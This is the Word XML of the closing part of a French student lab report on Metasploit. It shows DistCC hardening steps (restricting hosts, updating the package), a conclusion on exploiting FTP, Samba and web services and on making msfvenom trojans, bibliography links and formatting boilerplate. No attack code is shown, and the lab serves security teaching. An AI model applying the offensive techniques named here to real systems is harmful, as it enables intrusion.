      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF4E1F">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour restreindre l’accès uniquement aux hôtes de confiance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05608DF9" w14:textId="77777777" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DE2F38" w14:textId="77777777" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D59E0F7" w14:textId="77777777" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEFA2E2" w14:textId="1BABC477" w:rsidR="00AF4E1F" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc197957026"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vérifier </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>les mise</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> à jour de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scéurté</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour DistCC avec la commande :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634E881" w14:textId="23D1269A" w:rsidR="00AF4E1F" w:rsidRPr="00A74A85" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6302ED" w14:textId="18DF6D65" w:rsidR="00AF4E1F" w:rsidRPr="00A74A85" w:rsidRDefault="00AF4E1F" w:rsidP="00AF4E1F">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo apt upgrade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="699E0829" w14:textId="77777777" w:rsidR="006E0AA7" w:rsidRPr="00A74A85" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543B2668" w14:textId="77777777" w:rsidR="006E0AA7" w:rsidRPr="00A74A85" w:rsidRDefault="006E0AA7" w:rsidP="006E0AA7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622FEFED" w14:textId="77777777" w:rsidR="00D42D95" w:rsidRPr="00A74A85" w:rsidRDefault="00D42D95" w:rsidP="00D42D95">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53281A66" w14:textId="77777777" w:rsidR="00F57F97" w:rsidRPr="00A74A85" w:rsidRDefault="00F57F97" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B5FC01" w14:textId="77777777" w:rsidR="003E53FE" w:rsidRPr="00A74A85" w:rsidRDefault="003E53FE" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74A85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6B3EE" w14:textId="6AE887FE" w:rsidR="00FB256B" w:rsidRPr="00FB256B" w:rsidRDefault="00DD6201" w:rsidP="00A144BF">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc197957027"/>
      <w:r w:rsidRPr="004459DB">
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="58D5EFEE" w14:textId="1C94F4E0" w:rsidR="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:r w:rsidRPr="008422C4">
        <w:t xml:space="preserve">Ce TP sur Metasploit nous a permis de plonger de manière progressive et concrète dans l'univers du pentesting et de l'exploitation de vulnérabilités à l'aide de l'un des </w:t>
      </w:r>
      <w:r w:rsidR="00B302ED" w:rsidRPr="008422C4">
        <w:t>FrameWorks</w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:t xml:space="preserve"> les plus puissants du domaine de la cybersécurité offensive. En suivant les différents scénarios proposés</w:t>
      </w:r>
      <w:r w:rsidR="004C24EA">
        <w:t xml:space="preserve"> q</w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:t xml:space="preserve">u'il s'agisse d'exploits FTP, de failles Samba, d'exploitation de services web vulnérables ou de la génération de chevaux de Troie avec </w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:t xml:space="preserve"> — nous avons pu observer à quel point une mauvaise configuration, une version obsolète ou un service exposé peut compromettre un système.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6DB662" w14:textId="77777777" w:rsidR="004C24EA" w:rsidRPr="008422C4" w:rsidRDefault="004C24EA" w:rsidP="008422C4"/>
    <w:p w14:paraId="226256DA" w14:textId="77777777" w:rsidR="008422C4" w:rsidRPr="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:r w:rsidRPr="008422C4">
        <w:t>Au-delà de la simple exécution d'exploits, ce TP nous a surtout sensibilisés à l’importance :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAB76C" w14:textId="77777777" w:rsidR="008422C4" w:rsidRPr="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008422C4">
        <w:t>de bien comprendre chaque étape d'une attaque (reconnaissance, exploitation, post-exploitation),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B75FC" w14:textId="77777777" w:rsidR="008422C4" w:rsidRPr="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008422C4">
        <w:t>de maîtriser les outils à disposition pour simuler des attaques réalistes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA36E3" w14:textId="4D61ED4B" w:rsidR="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008422C4">
        <w:t xml:space="preserve">et surtout, de réfléchir aux </w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>contre-mesures</w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:t xml:space="preserve"> efficaces à mettre en place : mises à jour régulières, désactivation des services inutiles</w:t>
      </w:r>
      <w:r w:rsidR="004C24EA">
        <w:t xml:space="preserve"> et la </w:t>
      </w:r>
      <w:r w:rsidRPr="008422C4">
        <w:t>limitation des accès réseau</w:t>
      </w:r>
      <w:r w:rsidR="004C24EA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B72E92" w14:textId="77777777" w:rsidR="004C24EA" w:rsidRPr="008422C4" w:rsidRDefault="004C24EA" w:rsidP="004C24EA"/>
    <w:p w14:paraId="64188358" w14:textId="77777777" w:rsidR="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:r w:rsidRPr="008422C4">
        <w:t>Il est essentiel de souligner que si Metasploit est une arme redoutable dans les mains d’un attaquant, il l’est tout autant entre les mains d’un défenseur bien formé. Utilisé de façon éthique, il permet d'identifier, corriger et prévenir les failles avant qu'elles ne soient exploitées par des individus malveillants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F6A8C" w14:textId="77777777" w:rsidR="004C24EA" w:rsidRPr="008422C4" w:rsidRDefault="004C24EA" w:rsidP="008422C4"/>
    <w:p w14:paraId="1B73C1DB" w14:textId="77777777" w:rsidR="008422C4" w:rsidRPr="008422C4" w:rsidRDefault="008422C4" w:rsidP="008422C4">
      <w:r w:rsidRPr="008422C4">
        <w:t>En somme, ce TP fut une excellente introduction pratique à la sécurité offensive, et a permis de mieux comprendre comment se construisent les attaques pour mieux les anticiper et s’en défendre. Ce savoir est fondamental pour tout professionnel souhaitant évoluer dans les domaines de la cybersécurité, de l’audit de sécurité ou du développement sécurisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334C4241" w14:textId="77777777" w:rsidR="00FB256B" w:rsidRDefault="00FB256B" w:rsidP="00D6524A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12371EE5" w14:textId="696F00FF" w:rsidR="0086320C" w:rsidRDefault="00FB256B" w:rsidP="00950CF1">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc197957028"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Annexes</w:t>
      </w:r>
      <w:r w:rsidR="003E53FE">
        <w:t xml:space="preserve"> &amp; Bibliographie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="50FE52C5" w14:textId="70E36C00" w:rsidR="00950CF1" w:rsidRDefault="00950CF1" w:rsidP="00950CF1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00950CF1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>TP de Gelas et Begin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59CF29D0" w14:textId="77777777" w:rsidR="00950CF1" w:rsidRDefault="00950CF1" w:rsidP="00950CF1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79479200" w14:textId="29BCFCD1" w:rsidR="00950CF1" w:rsidRPr="00950CF1" w:rsidRDefault="00950CF1" w:rsidP="00950CF1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="00950CF1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Tutoriel Metasploit pour débutant</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00950CF1" w:rsidRPr="00950CF1" w:rsidSect="00731C5B">
      <w:footerReference w:type="default" r:id="rId73"/>
      <w:footerReference w:type="first" r:id="rId7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44535" w14:textId="77777777" w:rsidR="004D2BFE" w:rsidRPr="004459DB" w:rsidRDefault="004D2BFE" w:rsidP="00D6524A">
      <w:r w:rsidRPr="004459DB">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D6A2DE0" w14:textId="77777777" w:rsidR="004D2BFE" w:rsidRPr="004459DB" w:rsidRDefault="004D2BFE" w:rsidP="00D6524A">
      <w:r w:rsidRPr="004459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74693" w14:textId="6F31EF1B" w:rsidR="00CB5CC5" w:rsidRPr="004459DB" w:rsidRDefault="00CB5CC5" w:rsidP="00D6524A">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="0B67A08A" w14:textId="56E4468B" w:rsidR="00CB68B7" w:rsidRPr="004459DB" w:rsidRDefault="00CB68B7" w:rsidP="00D652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3565419"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="2092B340" w14:textId="77777777" w:rsidR="00CB5CC5" w:rsidRPr="004459DB" w:rsidRDefault="00CB5CC5" w:rsidP="00D6524A">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
        </w:pPr>
        <w:r w:rsidRPr="004459DB">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="36F37099" w14:textId="77777777" w:rsidR="00CB5CC5" w:rsidRPr="004459DB" w:rsidRDefault="00CB5CC5" w:rsidP="00D6524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700343"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="2980CDED" w14:textId="584E2C63" w:rsidR="00EA4861" w:rsidRPr="004459DB" w:rsidRDefault="00EA4861" w:rsidP="00D6524A">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
        </w:pPr>
        <w:r w:rsidRPr="004459DB">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="004459DB">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="49CF4B4A" w14:textId="77777777" w:rsidR="00EA4861" w:rsidRPr="004459DB" w:rsidRDefault="00EA4861" w:rsidP="00D652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7BC30" w14:textId="77777777" w:rsidR="004D2BFE" w:rsidRPr="004459DB" w:rsidRDefault="004D2BFE" w:rsidP="00D6524A">
      <w:r w:rsidRPr="004459DB">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DC113A0" w14:textId="77777777" w:rsidR="004D2BFE" w:rsidRPr="004459DB" w:rsidRDefault="004D2BFE" w:rsidP="00D6524A">
      <w:r w:rsidRPr="004459D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1AEE9" w14:textId="29F78C49" w:rsidR="00FF20C8" w:rsidRPr="004459DB" w:rsidRDefault="00EE6939" w:rsidP="00D6524A">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="118745" distR="118745" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="71A870DD" wp14:editId="15AF625E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>-524510</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>473075</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7021195" cy="179070"/>
              <wp:effectExtent l="0" t="0" r="1905" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="197" name="Rectangle 4"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="7021195" cy="17907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l="50000" t="50000" r="50000" b="50000"/>
                        </a:path>
                        <a:tileRect/>
                      </a:gradFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor">
                        <a:schemeClr val="lt1"/>
                      </a:fontRef>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:sdt>
                          <w:sdtPr>
                            <w:alias w:val="Titr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47E805FA" w14:textId="28F9CE08" w:rsidR="00EE6939" w:rsidRPr="00EE6939" w:rsidRDefault="00A31645" w:rsidP="00D6524A">
                              <w:pPr>
                                <w:pStyle w:val="En-tte"/>
                              </w:pPr>
                              <w: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A870DD" id="Rectangle 4" o:spid="_x0000_s1057" style="position:absolute;left:0;text-align:left;margin-left:-41.3pt;margin-top:37.25pt;width:552.85pt;height:14.1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" o:allowoverlap="f" fillcolor="#a00000" stroked="f">
              <v:fill color2="red" rotate="t" focusposition=".5,.5" focussize="" colors="0 #a00000;.5 #e60000;1 red" focus="100%" type="gradientRadial"/>
              <v:textbox>
                <w:txbxContent>
                  <w:sdt>
                    <w:sdtPr>
                      <w:alias w:val="Titr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47E805FA" w14:textId="28F9CE08" w:rsidR="00EE6939" w:rsidRPr="00EE6939" w:rsidRDefault="00A31645" w:rsidP="00D6524A">
                        <w:pPr>
                          <w:pStyle w:val="En-tte"/>
                        </w:pPr>
                        <w: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3E6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB22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C504B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1ED63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D7C3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D57CA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84C08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C67067E4"/>
    <w:lvl w:ilvl="0" w:tplc="F3C8D270">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7F32592"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15187F30"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040C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29334D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A672F042"/>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08717AEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F942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E6BF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="759C3F1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11D436BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="271CB1E8"/>
    <w:lvl w:ilvl="0" w:tplc="81C262B8">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170853B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE582AC2"/>
    <w:lvl w:ilvl="0" w:tplc="040C0017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2844" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3564" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4284" w:hanging="180"/>
      </w:p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10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17264D45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3330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041EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C072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53A4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F14C856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6633AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEDA8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C909D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1ECC95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1CDB3A20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="253C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2954E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D90E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1B76D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB386A8A"/>
    <w:lvl w:ilvl="0" w:tplc="A3661470">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1765" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3550" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4270" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040C000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4990" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5710" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6430" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040C000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7150" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7870" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8590" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="201452D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22AED46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165576C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A498E154"/>
    <w:lvl w:ilvl="0" w:tplc="5B30C816">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C60C8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="333604CC"/>
    <w:lvl w:ilvl="0" w:tplc="74A4360A">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240F0C43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9BECE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45452F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95A2EF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547531A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB04AEDA"/>
    <w:lvl w:ilvl="0" w:tplc="040C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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="289C2044"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8266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1904FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3B00BE0"/>
    <w:lvl w:ilvl="0" w:tplc="617E964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2C4A3E91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CC22CA8"/>
    <w:lvl w:ilvl="0" w:tplc="040C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E5935E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65329E0C"/>
    <w:lvl w:ilvl="0" w:tplc="B9EE91EE">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328D04C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD1276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36734D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4050B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337830"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38125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6D6779"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3B8FBA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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="389D1BBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69B8493E"/>
    <w:lvl w:ilvl="0" w:tplc="30B268D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Titre2"/>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38E44606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C2A9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92F0745"/>
